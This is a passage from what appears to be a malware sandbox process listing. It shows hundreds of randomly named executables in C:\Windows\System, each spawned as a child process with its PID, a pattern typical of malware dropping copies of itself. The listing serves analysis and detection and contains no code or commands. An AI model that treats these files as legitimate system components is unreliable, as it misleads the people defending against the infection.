  PID:2112
- C:\Windows\System\EsOhQAi.exe
  C:\Windows\System\EsOhQAi.exe
  2⤵
  PID:7024
- C:\Windows\System\BlndMFp.exe
  C:\Windows\System\BlndMFp.exe
  2⤵
  PID:2624
- C:\Windows\System\dRBTGOh.exe
  C:\Windows\System\dRBTGOh.exe
  2⤵
  PID:7624
- C:\Windows\System\AEHAARc.exe
  C:\Windows\System\AEHAARc.exe
  2⤵
  PID:1832
- C:\Windows\System\qzJCHjY.exe
  C:\Windows\System\qzJCHjY.exe
  2⤵
  PID:1108
- C:\Windows\System\ehxJjcK.exe
  C:\Windows\System\ehxJjcK.exe
  2⤵
  PID:7920
- C:\Windows\System\hJCBQbO.exe
  C:\Windows\System\hJCBQbO.exe
  2⤵
  PID:1000
- C:\Windows\System\ceqEiQS.exe
  C:\Windows\System\ceqEiQS.exe
  2⤵
  PID:8156
- C:\Windows\System\ktIdzaJ.exe
  C:\Windows\System\ktIdzaJ.exe
  2⤵
  PID:7816
- C:\Windows\System\qRSVBtk.exe
  C:\Windows\System\qRSVBtk.exe
  2⤵
  PID:7288
- C:\Windows\System\kTQnDjN.exe
  C:\Windows\System\kTQnDjN.exe
  2⤵
  PID:8140
- C:\Windows\System\bxGDGPi.exe
  C:\Windows\System\bxGDGPi.exe
  2⤵
  PID:5044
- C:\Windows\System\awRDOsP.exe
  C:\Windows\System\awRDOsP.exe
  2⤵
  PID:1812
- C:\Windows\System\ZopRzGu.exe
  C:\Windows\System\ZopRzGu.exe
  2⤵
  PID:7764
- C:\Windows\System\aoWWJzs.exe
  C:\Windows\System\aoWWJzs.exe
  2⤵
  PID:7812
- C:\Windows\System\EevctfO.exe
  C:\Windows\System\EevctfO.exe
  2⤵
  PID:6464
- C:\Windows\System\hIzlkDV.exe
  C:\Windows\System\hIzlkDV.exe
  2⤵
  PID:7796
- C:\Windows\System\DliKSrV.exe
  C:\Windows\System\DliKSrV.exe
  2⤵
  PID:5016
- C:\Windows\System\JJtAmGs.exe
  C:\Windows\System\JJtAmGs.exe
  2⤵
  PID:7492
- C:\Windows\System\bWaPIyi.exe
  C:\Windows\System\bWaPIyi.exe
  2⤵
  PID:7784
- C:\Windows\System\wxISpbE.exe
  C:\Windows\System\wxISpbE.exe
  2⤵
  PID:876
- C:\Windows\System\JJdBWTt.exe
  C:\Windows\System\JJdBWTt.exe
  2⤵
  PID:6836
- C:\Windows\System\ihlignV.exe
  C:\Windows\System\ihlignV.exe
  2⤵
  PID:7268
- C:\Windows\System\ZDZDjtA.exe
  C:\Windows\System\ZDZDjtA.exe
  2⤵
  PID:7684
- C:\Windows\System\RBmAPFp.exe
  C:\Windows\System\RBmAPFp.exe
  2⤵
  PID:8148
- C:\Windows\System\XMncgUW.exe
  C:\Windows\System\XMncgUW.exe
  2⤵
  PID:1836
- C:\Windows\System\yiqpjKX.exe
  C:\Windows\System\yiqpjKX.exe
  2⤵
  PID:7600
- C:\Windows\System\nBBSBHw.exe
  C:\Windows\System\nBBSBHw.exe
  2⤵
  PID:7996
- C:\Windows\System\lDdpoEH.exe
  C:\Windows\System\lDdpoEH.exe
  2⤵
  PID:3992
- C:\Windows\System\tafJBFF.exe
  C:\Windows\System\tafJBFF.exe
  2⤵
  PID:7972
- C:\Windows\System\SRMKjoi.exe
  C:\Windows\System\SRMKjoi.exe
  2⤵
  PID:7904
- C:\Windows\System\MXByLgX.exe
  C:\Windows\System\MXByLgX.exe
  2⤵
  PID:8208
- C:\Windows\System\Kxwznag.exe
  C:\Windows\System\Kxwznag.exe
  2⤵
  PID:8228
- C:\Windows\System\jYgLBYb.exe
  C:\Windows\System\jYgLBYb.exe
  2⤵
  PID:8260
- C:\Windows\System\eVVhAFX.exe
  C:\Windows\System\eVVhAFX.exe
  2⤵
  PID:8280
- C:\Windows\System\rqkXmjz.exe
  C:\Windows\System\rqkXmjz.exe
  2⤵
  PID:8324
- C:\Windows\System\TOHqrta.exe
  C:\Windows\System\TOHqrta.exe
  2⤵
  PID:8348
- C:\Windows\System\vsVRgsS.exe
  C:\Windows\System\vsVRgsS.exe
  2⤵
  PID:8380
- C:\Windows\System\ErYhExS.exe
  C:\Windows\System\ErYhExS.exe
  2⤵
  PID:8424
- C:\Windows\System\LbfHGPB.exe
  C:\Windows\System\LbfHGPB.exe
  2⤵
  PID:8472
- C:\Windows\System\yAJasFI.exe
  C:\Windows\System\yAJasFI.exe
  2⤵
  PID:8512
- C:\Windows\System\GYJiJLt.exe
  C:\Windows\System\GYJiJLt.exe
  2⤵
  PID:8536
- C:\Windows\System\xDTHEqa.exe
  C:\Windows\System\xDTHEqa.exe
  2⤵
  PID:8584
- C:\Windows\System\lEDKBLK.exe
  C:\Windows\System\lEDKBLK.exe
  2⤵
  PID:8620
- C:\Windows\System\DQGhNcx.exe
  C:\Windows\System\DQGhNcx.exe
  2⤵
  PID:8656
- C:\Windows\System\YEsuoIk.exe
  C:\Windows\System\YEsuoIk.exe
  2⤵
  PID:8680
- C:\Windows\System\CymysOP.exe
  C:\Windows\System\CymysOP.exe
  2⤵
  PID:8712
- C:\Windows\System\npEFRdp.exe
  C:\Windows\System\npEFRdp.exe
  2⤵
  PID:8768
- C:\Windows\System\yuCRxCs.exe
  C:\Windows\System\yuCRxCs.exe
  2⤵
  PID:8800
- C:\Windows\System\nDsZDOa.exe
  C:\Windows\System\nDsZDOa.exe
  2⤵
  PID:8848
- C:\Windows\System\kIagzNr.exe
  C:\Windows\System\kIagzNr.exe
  2⤵
  PID:8884
- C:\Windows\System\BCduHuS.exe
  C:\Windows\System\BCduHuS.exe
  2⤵
  PID:8900
- C:\Windows\System\oEkidyA.exe
  C:\Windows\System\oEkidyA.exe
  2⤵
  PID:8940
- C:\Windows\System\QRmRRBa.exe
  C:\Windows\System\QRmRRBa.exe
  2⤵
  PID:8968
- C:\Windows\System\nmYzXoT.exe
  C:\Windows\System\nmYzXoT.exe
  2⤵
  PID:8996
- C:\Windows\System\NRsLDFc.exe
  C:\Windows\System\NRsLDFc.exe
  2⤵
  PID:9024
- C:\Windows\System\JajgUgc.exe
  C:\Windows\System\JajgUgc.exe
  2⤵
  PID:9052
- C:\Windows\System\nDtipVt.exe
  C:\Windows\System\nDtipVt.exe
  2⤵
  PID:9080
- C:\Windows\System\qJUjcxG.exe
  C:\Windows\System\qJUjcxG.exe
  2⤵
  PID:9108
- C:\Windows\System\pokUVgq.exe
  C:\Windows\System\pokUVgq.exe
  2⤵
  PID:9136
- C:\Windows\System\xyqRLnY.exe
  C:\Windows\System\xyqRLnY.exe
  2⤵
  PID:9164
- C:\Windows\System\soScIRe.exe
  C:\Windows\System\soScIRe.exe
  2⤵
  PID:9180
- C:\Windows\System\gqsAMIf.exe
  C:\Windows\System\gqsAMIf.exe
  2⤵
  PID:9208
- C:\Windows\System\bQCQYbh.exe
  C:\Windows\System\bQCQYbh.exe
  2⤵
  PID:8204
- C:\Windows\System\bpeOSkC.exe
  C:\Windows\System\bpeOSkC.exe
  2⤵
  PID:8240
- C:\Windows\System\BNCaMyv.exe
  C:\Windows\System\BNCaMyv.exe
  2⤵
  PID:8256
- C:\Windows\System\pvrvjrS.exe
  C:\Windows\System\pvrvjrS.exe
  2⤵
  PID:8344
- C:\Windows\System\JeJAHWZ.exe
  C:\Windows\System\JeJAHWZ.exe
  2⤵
  PID:8368
- C:\Windows\System\hPOeZiV.exe
  C:\Windows\System\hPOeZiV.exe
  2⤵
  PID:8420
- C:\Windows\System\hYfpEKG.exe
  C:\Windows\System\hYfpEKG.exe
  2⤵
  PID:8504
- C:\Windows\System\qtipaDO.exe
  C:\Windows\System\qtipaDO.exe
  2⤵
  PID:8560
- C:\Windows\System\orwcFJP.exe
  C:\Windows\System\orwcFJP.exe
  2⤵
  PID:8644
- C:\Windows\System\KeLKwPQ.exe
  C:\Windows\System\KeLKwPQ.exe
  2⤵
  PID:8664
- C:\Windows\System\ZxNFGeN.exe
  C:\Windows\System\ZxNFGeN.exe
  2⤵
  PID:8728
- C:\Windows\System\TovnRbz.exe
  C:\Windows\System\TovnRbz.exe
  2⤵
  PID:8796
- C:\Windows\System\MhJIjeW.exe
  C:\Windows\System\MhJIjeW.exe
  2⤵
  PID:8836
- C:\Windows\System\CXnBCPZ.exe
  C:\Windows\System\CXnBCPZ.exe
  2⤵
  PID:8912
- C:\Windows\System\CMbXnaR.exe
  C:\Windows\System\CMbXnaR.exe
  2⤵
  PID:8960
- C:\Windows\System\IKcQexW.exe
  C:\Windows\System\IKcQexW.exe
  2⤵
  PID:9020
- C:\Windows\System\HlhZMXj.exe
  C:\Windows\System\HlhZMXj.exe
  2⤵
  PID:9092
- C:\Windows\System\mNxsSKJ.exe
  C:\Windows\System\mNxsSKJ.exe
  2⤵
  PID:9156
- C:\Windows\System\emVHAiJ.exe
  C:\Windows\System\emVHAiJ.exe
  2⤵
  PID:9196
- C:\Windows\System\WHAfPAB.exe
  C:\Windows\System\WHAfPAB.exe
  2⤵
  PID:8360
- C:\Windows\System\kiddOmO.exe
  C:\Windows\System\kiddOmO.exe
  2⤵
  PID:8456
- C:\Windows\System\XvcEYCL.exe
  C:\Windows\System\XvcEYCL.exe
  2⤵
  PID:8532
- C:\Windows\System\lwPYKDQ.exe
  C:\Windows\System\lwPYKDQ.exe
  2⤵
  PID:8640
- C:\Windows\System\EFXlWjV.exe
  C:\Windows\System\EFXlWjV.exe
  2⤵
  PID:8756
- C:\Windows\System\iIXCRKY.exe
  C:\Windows\System\iIXCRKY.exe
  2⤵
  PID:8860
- C:\Windows\System\RrsUSSh.exe
  C:\Windows\System\RrsUSSh.exe
  2⤵
  PID:8952
- C:\Windows\System\lxFDalJ.exe
  C:\Windows\System\lxFDalJ.exe
  2⤵
  PID:9128
- C:\Windows\System\UXNwbbP.exe
  C:\Windows\System\UXNwbbP.exe
  2⤵
  PID:8276
- C:\Windows\System\dvKOGNl.exe
  C:\Windows\System\dvKOGNl.exe
  2⤵
  PID:8632
- C:\Windows\System\ZGsBekY.exe
  C:\Windows\System\ZGsBekY.exe
  2⤵
  PID:8812
- C:\Windows\System\xUDBjQl.exe
  C:\Windows\System\xUDBjQl.exe
  2⤵
  PID:8604
- C:\Windows\System\BpoinVX.exe
  C:\Windows\System\BpoinVX.exe
  2⤵
  PID:9064
- C:\Windows\System\gzJbBhH.exe
  C:\Windows\System\gzJbBhH.exe
  2⤵
  PID:9192
- C:\Windows\System\iLqbbsn.exe
  C:\Windows\System\iLqbbsn.exe
  2⤵
  PID:9232
- C:\Windows\System\fNxiCqP.exe
  C:\Windows\System\fNxiCqP.exe
  2⤵
  PID:9248
- C:\Windows\System\iHkOvbN.exe
  C:\Windows\System\iHkOvbN.exe
  2⤵
  PID:9284
- C:\Windows\System\erWNZEp.exe
  C:\Windows\System\erWNZEp.exe
  2⤵
  PID:9316
- C:\Windows\System\aSPYupV.exe
  C:\Windows\System\aSPYupV.exe
  2⤵
  PID:9344
- C:\Windows\System\xxSlAGF.exe
  C:\Windows\System\xxSlAGF.exe
  2⤵
  PID:9360
- C:\Windows\System\yMmFUCQ.exe
  C:\Windows\System\yMmFUCQ.exe
  2⤵
  PID:9388
- C:\Windows\System\pSwstfW.exe
  C:\Windows\System\pSwstfW.exe
  2⤵
  PID:9416
- C:\Windows\System\XoLApZb.exe
  C:\Windows\System\XoLApZb.exe
  2⤵
  PID:9444
- C:\Windows\System\QDMopQk.exe
  C:\Windows\System\QDMopQk.exe
  2⤵
  PID:9472
- C:\Windows\System\GXRsdGb.exe
  C:\Windows\System\GXRsdGb.exe
  2⤵
  PID:9512
- C:\Windows\System\PgEbRDK.exe
  C:\Windows\System\PgEbRDK.exe
  2⤵
  PID:9536
- C:\Windows\System\gIkbgen.exe
  C:\Windows\System\gIkbgen.exe
  2⤵
  PID:9556
- C:\Windows\System\xgiyYMA.exe
  C:\Windows\System\xgiyYMA.exe
  2⤵
  PID:9576
- C:\Windows\System\YikRNcl.exe
  C:\Windows\System\YikRNcl.exe
  2⤵
  PID:9620
- C:\Windows\System\uZeIkhT.exe
  C:\Windows\System\uZeIkhT.exe
  2⤵
  PID:9672
- C:\Windows\System\okKblfw.exe
  C:\Windows\System\okKblfw.exe
  2⤵
  PID:9700
- C:\Windows\System\DqtRCWl.exe
  C:\Windows\System\DqtRCWl.exe
  2⤵
  PID:9716
- C:\Windows\System\pPCiOEe.exe
  C:\Windows\System\pPCiOEe.exe
  2⤵
  PID:9740
- C:\Windows\System\linqhqS.exe
  C:\Windows\System\linqhqS.exe
  2⤵
  PID:9784
- C:\Windows\System\GCwPGiB.exe
  C:\Windows\System\GCwPGiB.exe
  2⤵
  PID:9812
- C:\Windows\System\WyIVoMU.exe
  C:\Windows\System\WyIVoMU.exe
  2⤵
  PID:9844
- C:\Windows\System\OqYNvNm.exe
  C:\Windows\System\OqYNvNm.exe
  2⤵
  PID:9872
- C:\Windows\System\LbpOzxD.exe
  C:\Windows\System\LbpOzxD.exe
  2⤵
  PID:9900
- C:\Windows\System\oKtluaI.exe
  C:\Windows\System\oKtluaI.exe
  2⤵
  PID:9916
- C:\Windows\System\oerfraJ.exe
  C:\Windows\System\oerfraJ.exe
  2⤵
  PID:9944
- C:\Windows\System\uMGrjFO.exe
  C:\Windows\System\uMGrjFO.exe
  2⤵
  PID:9984
- C:\Windows\System\svmPNsS.exe
  C:\Windows\System\svmPNsS.exe
  2⤵
  PID:10012
- C:\Windows\System\GfIGNhh.exe
  C:\Windows\System\GfIGNhh.exe
  2⤵
  PID:10040
- C:\Windows\System\QiLnmxw.exe
  C:\Windows\System\QiLnmxw.exe
  2⤵
  PID:10068
- C:\Windows\System\iRrpRcx.exe
  C:\Windows\System\iRrpRcx.exe
  2⤵
  PID:10084
- C:\Windows\System\iEmXXWK.exe
  C:\Windows\System\iEmXXWK.exe
  2⤵
  PID:10112
- C:\Windows\System\skCFkjg.exe
  C:\Windows\System\skCFkjg.exe
  2⤵
  PID:10140
- C:\Windows\System\ODAhzWT.exe
  C:\Windows\System\ODAhzWT.exe
  2⤵
  PID:10168
- C:\Windows\System\hdzXnly.exe
  C:\Windows\System\hdzXnly.exe
  2⤵
  PID:10200
- C:\Windows\System\fajnSPy.exe
  C:\Windows\System\fajnSPy.exe
  2⤵
  PID:10224
- C:\Windows\System\dWHvZbx.exe
  C:\Windows\System\dWHvZbx.exe
  2⤵
  PID:9244
- C:\Windows\System\NvCBzTx.exe
  C:\Windows\System\NvCBzTx.exe
  2⤵
  PID:9304
- C:\Windows\System\NbVxAPb.exe
  C:\Windows\System\NbVxAPb.exe
  2⤵
  PID:9372
- C:\Windows\System\JHLhmwL.exe
  C:\Windows\System\JHLhmwL.exe
  2⤵
  PID:9404
- C:\Windows\System\hVxRObL.exe
  C:\Windows\System\hVxRObL.exe
  2⤵
  PID:9456
- C:\Windows\System\njsHeXw.exe
  C:\Windows\System\njsHeXw.exe
  2⤵
  PID:9604
- C:\Windows\System\yqzBxez.exe
  C:\Windows\System\yqzBxez.exe
  2⤵
  PID:8872
- C:\Windows\System\DxDPxcw.exe
  C:\Windows\System\DxDPxcw.exe
  2⤵
  PID:9768
- C:\Windows\System\qFjrDkf.exe
  C:\Windows\System\qFjrDkf.exe
  2⤵
  PID:9796
- C:\Windows\System\nDJFhny.exe
  C:\Windows\System\nDJFhny.exe
  2⤵
  PID:9840
- C:\Windows\System\FhWZMGI.exe
  C:\Windows\System\FhWZMGI.exe
  2⤵
  PID:9936
- C:\Windows\System\tsceMFS.exe
  C:\Windows\System\tsceMFS.exe
  2⤵
  PID:9976
- C:\Windows\System\MvqSwCb.exe
  C:\Windows\System\MvqSwCb.exe
  2⤵
  PID:10056
- C:\Windows\System\TmHPZIH.exe
  C:\Windows\System\TmHPZIH.exe
  2⤵
  PID:10156
- C:\Windows\System\nmRTKgl.exe
  C:\Windows\System\nmRTKgl.exe
  2⤵
  PID:10208
- C:\Windows\System\joHWIer.exe
  C:\Windows\System\joHWIer.exe
  2⤵
  PID:10236
- C:\Windows\System\VickSmx.exe
  C:\Windows\System\VickSmx.exe
  2⤵
  PID:9328
- C:\Windows\System\xHXrsMm.exe
  C:\Windows\System\xHXrsMm.exe
  2⤵
  PID:9520
- C:\Windows\System\oBZfUaW.exe
  C:\Windows\System\oBZfUaW.exe
  2⤵
  PID:9728
- C:\Windows\System\uYLThVP.exe
  C:\Windows\System\uYLThVP.exe
  2⤵
  PID:9828
- C:\Windows\System\vvpHFHN.exe
  C:\Windows\System\vvpHFHN.exe
  2⤵
  PID:9928
- C:\Windows\System\hPOCwzZ.exe
  C:\Windows\System\hPOCwzZ.exe
  2⤵
  PID:10060
- C:\Windows\System\PwuBFui.exe
  C:\Windows\System\PwuBFui.exe
  2⤵
  PID:9400
- C:\Windows\System\mbSsofw.exe
  C:\Windows\System\mbSsofw.exe
  2⤵
  PID:9884
- C:\Windows\System\doUKitp.exe
  C:\Windows\System\doUKitp.exe
  2⤵
  PID:10048
- C:\Windows\System\pKKJuIA.exe
  C:\Windows\System\pKKJuIA.exe
  2⤵
  PID:10028
- C:\Windows\System\KjqsYmZ.exe
  C:\Windows\System\KjqsYmZ.exe
  2⤵
  PID:10248
- C:\Windows\System\vrNwhUW.exe
  C:\Windows\System\vrNwhUW.exe
  2⤵
  PID:10280
- C:\Windows\System\wfrBjZX.exe
  C:\Windows\System\wfrBjZX.exe
  2⤵
  PID:10308
- C:\Windows\System\OERNfZx.exe
  C:\Windows\System\OERNfZx.exe
  2⤵
  PID:10336
- C:\Windows\System\aIIIUiz.exe
  C:\Windows\System\aIIIUiz.exe
  2⤵
  PID:10364
- C:\Windows\System\zGTGlIT.exe
  C:\Windows\System\zGTGlIT.exe
  2⤵
  PID:10392
- C:\Windows\System\hFtEwfa.exe
  C:\Windows\System\hFtEwfa.exe
  2⤵
  PID:10412
- C:\Windows\System\bKkqWpc.exe
  C:\Windows\System\bKkqWpc.exe
  2⤵
  PID:10444
- C:\Windows\System\qKbYxko.exe
  C:\Windows\System\qKbYxko.exe
  2⤵
  PID:10476
- C:\Windows\System\codBBgK.exe
  C:\Windows\System\codBBgK.exe
  2⤵
  PID:10504
- C:\Windows\System\ZSdBrxD.exe
  C:\Windows\System\ZSdBrxD.exe
  2⤵
  PID:10532
- C:\Windows\System\RQzIusf.exe
  C:\Windows\System\RQzIusf.exe
  2⤵
  PID:10552
- C:\Windows\System\ndLJsTD.exe
  C:\Windows\System\ndLJsTD.exe
  2⤵
  PID:10588
- C:\Windows\System\gVQaMPq.exe
  C:\Windows\System\gVQaMPq.exe
  2⤵
  PID:10616
- C:\Windows\System\GVqpQNJ.exe
  C:\Windows\System\GVqpQNJ.exe
  2⤵
  PID:10644
- C:\Windows\System\CDlfHOL.exe
  C:\Windows\System\CDlfHOL.exe
  2⤵
  PID:10672
- C:\Windows\System\MAVvqhc.exe
  C:\Windows\System\MAVvqhc.exe
  2⤵
  PID:10700
- C:\Windows\System\wUuQWME.exe
  C:\Windows\System\wUuQWME.exe
  2⤵
  PID:10716
- C:\Windows\System\zKxRFQc.exe
  C:\Windows\System\zKxRFQc.exe
  2⤵
  PID:10756
- C:\Windows\System\yCBsxqq.exe
  C:\Windows\System\yCBsxqq.exe
  2⤵
  PID:10784
- C:\Windows\System\iVbweQU.exe
  C:\Windows\System\iVbweQU.exe
  2⤵
  PID:10808
- C:\Windows\System\nLxAfKc.exe
  C:\Windows\System\nLxAfKc.exe
  2⤵
  PID:10828
- C:\Windows\System\MYZgNPs.exe
  C:\Windows\System\MYZgNPs.exe
  2⤵
  PID:10868
- C:\Windows\System\nbiMJTp.exe
  C:\Windows\System\nbiMJTp.exe
  2⤵
  PID:10884
- C:\Windows\System\jbKOfeq.exe
  C:\Windows\System\jbKOfeq.exe
  2⤵
  PID:10912
- C:\Windows\System\ORvvenK.exe
  C:\Windows\System\ORvvenK.exe
  2⤵
  PID:10952
- C:\Windows\System\VVpxJOx.exe
  C:\Windows\System\VVpxJOx.exe
  2⤵
  PID:10980
- C:\Windows\System\fLsXFTG.exe
  C:\Windows\System\fLsXFTG.exe
  2⤵
  PID:11004
- C:\Windows\System\LvZoEap.exe
  C:\Windows\System\LvZoEap.exe
  2⤵
  PID:11036
- C:\Windows\System\ikgdwgX.exe
  C:\Windows\System\ikgdwgX.exe
  2⤵
  PID:11052
- C:\Windows\System\EvyTEtR.exe
  C:\Windows\System\EvyTEtR.exe
  2⤵
  PID:11072
- C:\Windows\System\YgCNKyJ.exe
  C:\Windows\System\YgCNKyJ.exe
  2⤵
  PID:11100
- C:\Windows\System\meNNRpX.exe
  C:\Windows\System\meNNRpX.exe
  2⤵
  PID:11120
- C:\Windows\System\uwjXXqP.exe
  C:\Windows\System\uwjXXqP.exe
  2⤵
  PID:11136
- C:\Windows\System\vscvKCO.exe
  C:\Windows\System\vscvKCO.exe
  2⤵
  PID:11180
- C:\Windows\System\evSCDeL.exe
  C:\Windows\System\evSCDeL.exe
  2⤵
  PID:11216
- C:\Windows\System\NirfRxR.exe
  C:\Windows\System\NirfRxR.exe
  2⤵
  PID:11252
- C:\Windows\System\XvvJtEZ.exe
  C:\Windows\System\XvvJtEZ.exe
  2⤵
  PID:10268
- C:\Windows\System\oxatjqs.exe
  C:\Windows\System\oxatjqs.exe
  2⤵
  PID:10384
- C:\Windows\System\BWDGZpf.exe
  C:\Windows\System\BWDGZpf.exe
  2⤵
  PID:10420
- C:\Windows\System\WBASmqO.exe
  C:\Windows\System\WBASmqO.exe
  2⤵
  PID:10496
- C:\Windows\System\GTzDpcH.exe
  C:\Windows\System\GTzDpcH.exe
  2⤵
  PID:10572
- C:\Windows\System\nuircyQ.exe
  C:\Windows\System\nuircyQ.exe
  2⤵
  PID:10628
- C:\Windows\System\XytJjrs.exe
  C:\Windows\System\XytJjrs.exe
  2⤵
  PID:10660
- C:\Windows\System\JuFvrWf.exe
  C:\Windows\System\JuFvrWf.exe
  2⤵
  PID:10752
- C:\Windows\System\AglOmCk.exe
  C:\Windows\System\AglOmCk.exe
  2⤵
  PID:10804
- C:\Windows\System\RPkRfWk.exe
  C:\Windows\System\RPkRfWk.exe
  2⤵
  PID:10880
- C:\Windows\System\ROhgJxb.exe
  C:\Windows\System\ROhgJxb.exe
  2⤵
  PID:10948
- C:\Windows\System\QCKcRQM.exe
  C:\Windows\System\QCKcRQM.exe
  2⤵
  PID:11020
- C:\Windows\System\IDMwugx.exe
  C:\Windows\System\IDMwugx.exe
  2⤵
  PID:11084
- C:\Windows\System\pvazXgi.exe
  C:\Windows\System\pvazXgi.exe
  2⤵
  PID:11152
- C:\Windows\System\GTlRfuK.exe
  C:\Windows\System\GTlRfuK.exe
  2⤵
  PID:11196
- C:\Windows\System\wAOsYJh.exe
  C:\Windows\System\wAOsYJh.exe
  2⤵
  PID:11236
- C:\Windows\System\EwkBKSJ.exe
  C:\Windows\System\EwkBKSJ.exe
  2⤵
  PID:10452
- C:\Windows\System\EfqYKgC.exe
  C:\Windows\System\EfqYKgC.exe
  2⤵
  PID:10540
- C:\Windows\System\paAIfqL.exe
  C:\Windows\System\paAIfqL.exe
  2⤵
  PID:10656
- C:\Windows\System\nUJriVN.exe
  C:\Windows\System\nUJriVN.exe
  2⤵
  PID:10860
- C:\Windows\System\HQzonSF.exe
  C:\Windows\System\HQzonSF.exe
  2⤵
  PID:10944
- C:\Windows\System\rwVUUkH.exe
  C:\Windows\System\rwVUUkH.exe
  2⤵
  PID:11108
- C:\Windows\System\HbPDNcm.exe
  C:\Windows\System\HbPDNcm.exe
  2⤵
  PID:9824
- C:\Windows\System\CdHqJmJ.exe
  C:\Windows\System\CdHqJmJ.exe
  2⤵
  PID:10488
- C:\Windows\System\dddZaJn.exe
  C:\Windows\System\dddZaJn.exe
  2⤵
  PID:11016
- C:\Windows\System\guCoVvF.exe
  C:\Windows\System\guCoVvF.exe
  2⤵
  PID:10292
- C:\Windows\System\RMlyvOH.exe
  C:\Windows\System\RMlyvOH.exe
  2⤵
  PID:11168
- C:\Windows\System\CSjhASE.exe
  C:\Windows\System\CSjhASE.exe
  2⤵
  PID:10908
- C:\Windows\System\XvuCTJN.exe
  C:\Windows\System\XvuCTJN.exe
  2⤵
  PID:11288
- C:\Windows\System\IEnuIyg.exe
  C:\Windows\System\IEnuIyg.exe
  2⤵
  PID:11316
- C:\Windows\System\GwQaxGJ.exe
  C:\Windows\System\GwQaxGJ.exe
  2⤵
  PID:11344
- C:\Windows\System\WZRLzjc.exe
  C:\Windows\System\WZRLzjc.exe
  2⤵
  PID:11376
- C:\Windows\System\bKTpcBS.exe
  C:\Windows\System\bKTpcBS.exe
  2⤵
  PID:11412
- C:\Windows\System\FURIzDr.exe
  C:\Windows\System\FURIzDr.exe
  2⤵
  PID:11444
- C:\Windows\System\ZrXXXKm.exe
  C:\Windows\System\ZrXXXKm.exe
  2⤵
  PID:11472
- C:\Windows\System\smrxhpp.exe
  C:\Windows\System\smrxhpp.exe
  2⤵
  PID:11500
- C:\Windows\System\DaEnzHR.exe
  C:\Windows\System\DaEnzHR.exe
  2⤵
  PID:11516
- C:\Windows\System\ueyEJgc.exe
  C:\Windows\System\ueyEJgc.exe
  2⤵
  PID:11544
- C:\Windows\System\EOoGToQ.exe
  C:\Windows\System\EOoGToQ.exe
  2⤵
  PID:11572
- C:\Windows\System\wgbElqy.exe
  C:\Windows\System\wgbElqy.exe
  2⤵
  PID:11612
- C:\Windows\System\uMPboTI.exe
  C:\Windows\System\uMPboTI.exe
  2⤵
  PID:11640
- C:\Windows\System\ERScTON.exe
  C:\Windows\System\ERScTON.exe
  2⤵
  PID:11656
- C:\Windows\System\LNSsQVy.exe
  C:\Windows\System\LNSsQVy.exe
  2⤵
  PID:11684
- C:\Windows\System\ugdckGI.exe
  C:\Windows\System\ugdckGI.exe
  2⤵
  PID:11704
- C:\Windows\System\DqWMJwo.exe
  C:\Windows\System\DqWMJwo.exe
  2⤵
  PID:11740
- C:\Windows\System\xXHMBVl.exe
  C:\Windows\System\xXHMBVl.exe
  2⤵
  PID:11772
- C:\Windows\System\eQsypen.exe
  C:\Windows\System\eQsypen.exe
  2⤵
  PID:11788
- C:\Windows\System\jTFzQLA.exe
  C:\Windows\System\jTFzQLA.exe
  2⤵
  PID:11824
- C:\Windows\System\elNRhxT.exe
  C:\Windows\System\elNRhxT.exe
  2⤵
  PID:11864
- C:\Windows\System\PqQalaT.exe
  C:\Windows\System\PqQalaT.exe
  2⤵
  PID:11880
- C:\Windows\System\pYZhEVG.exe
  C:\Windows\System\pYZhEVG.exe
  2⤵
  PID:11912
- C:\Windows\System\bDkiATf.exe
  C:\Windows\System\bDkiATf.exe
  2⤵
  PID:11952
- C:\Windows\System\dfKgHXT.exe
  C:\Windows\System\dfKgHXT.exe
  2⤵
  PID:11980
- C:\Windows\System\EVpIcPL.exe
  C:\Windows\System\EVpIcPL.exe
  2⤵
  PID:12004
- C:\Windows\System\MqAhOEv.exe
  C:\Windows\System\MqAhOEv.exe
  2⤵
  PID:12020
- C:\Windows\System\calKgGH.exe
  C:\Windows\System\calKgGH.exe
  2⤵
  PID:12044
- C:\Windows\System\OLlBkDV.exe
  C:\Windows\System\OLlBkDV.exe
  2⤵
  PID:12080
- C:\Windows\System\aHKhlXU.exe
  C:\Windows\System\aHKhlXU.exe
  2⤵
  PID:12120
- C:\Windows\System\AOmNJpN.exe
  C:\Windows\System\AOmNJpN.exe
  2⤵
  PID:12136
- C:\Windows\System\JwafVVD.exe
  C:\Windows\System\JwafVVD.exe
  2⤵
  PID:12164
- C:\Windows\System\pkRHajP.exe
  C:\Windows\System\pkRHajP.exe
  2⤵
  PID:12204
- C:\Windows\System\ISmHkxm.exe
  C:\Windows\System\ISmHkxm.exe
  2⤵
  PID:12220
- C:\Windows\System\coPTeyV.exe
  C:\Windows\System\coPTeyV.exe
  2⤵
  PID:12252
- C:\Windows\System\lyUgJDI.exe
  C:\Windows\System\lyUgJDI.exe
  2⤵
  PID:10600
- C:\Windows\System\uKyVxwx.exe
  C:\Windows\System\uKyVxwx.exe
  2⤵
  PID:1584
- C:\Windows\System\MIisbKT.exe
  C:\Windows\System\MIisbKT.exe
  2⤵
  PID:11384
- C:\Windows\System\ZQssIps.exe
  C:\Windows\System\ZQssIps.exe
  2⤵
  PID:11404
- C:\Windows\System\paCbgAF.exe
  C:\Windows\System\paCbgAF.exe
  2⤵
  PID:11428
- C:\Windows\System\nvEZned.exe
  C:\Windows\System\nvEZned.exe
  2⤵
  PID:11508
- C:\Windows\System\SIvMiSJ.exe
  C:\Windows\System\SIvMiSJ.exe
  2⤵
  PID:11600
- C:\Windows\System\sMuQYnp.exe
  C:\Windows\System\sMuQYnp.exe
  2⤵
  PID:11652
- C:\Windows\System\ofXBuLp.exe
  C:\Windows\System\ofXBuLp.exe
  2⤵
  PID:11680
- C:\Windows\System\EgVDEjQ.exe
  C:\Windows\System\EgVDEjQ.exe
  2⤵
  PID:11752
- C:\Windows\System\dpuglKg.exe
  C:\Windows\System\dpuglKg.exe
  2⤵
  PID:11808
- C:\Windows\System\CtCfndH.exe
  C:\Windows\System\CtCfndH.exe
  2⤵
  PID:11876
- C:\Windows\System\JZimHxZ.exe
  C:\Windows\System\JZimHxZ.exe
  2⤵
  PID:11928
- C:\Windows\System\GxVTXRu.exe
  C:\Windows\System\GxVTXRu.exe
  2⤵
  PID:12016
- C:\Windows\System\HgWatba.exe
  C:\Windows\System\HgWatba.exe
  2⤵
  PID:12052
- C:\Windows\System\YmxqcHy.exe
  C:\Windows\System\YmxqcHy.exe
  2⤵
  PID:12148
- C:\Windows\System\ittNHgX.exe
  C:\Windows\System\ittNHgX.exe
  2⤵
  PID:12216
- C:\Windows\System\jywDZpE.exe
  C:\Windows\System\jywDZpE.exe
  2⤵
  PID:11280
